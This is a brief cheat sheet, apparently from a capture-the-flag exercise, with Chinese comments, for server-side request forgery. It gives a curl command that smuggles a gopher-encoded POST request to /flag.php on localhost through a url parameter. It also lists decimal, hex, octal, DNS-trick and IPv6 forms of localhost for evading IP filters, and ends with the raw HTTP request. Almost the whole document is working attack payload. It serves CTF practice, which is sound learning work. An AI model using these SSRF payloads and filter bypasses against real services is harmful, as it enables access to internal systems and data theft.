# 請參考 ssrf
# curl 'http://127.0.0.1:3000/?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHOST:127.0.0.1%250D%250AContent-Length:%252014%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250A%250D%250Agivemeflag=yes%250D%250A'
#
# bypass IP:
# 10 進位: 2130706433
# 16 進位: 0x7f000001
# 16 進位: 0x7f.0x00.0x00.0x01
#  8 進位: 017700000001
# localhost
# whatever.localtest.me
# 127.0.0.1.xip.io
# IDN Encoding
# 127.1

# IPV6:
# [::127.0.0.1]
# [::1]
# [::]
# 都會指向 localhost
 
_POST /flag.php HTTP/1.1
HOST:127.0.0.1
Content-Length: 14
Content-Type: application/x-www-form-urlencoded

givemeflag=yes
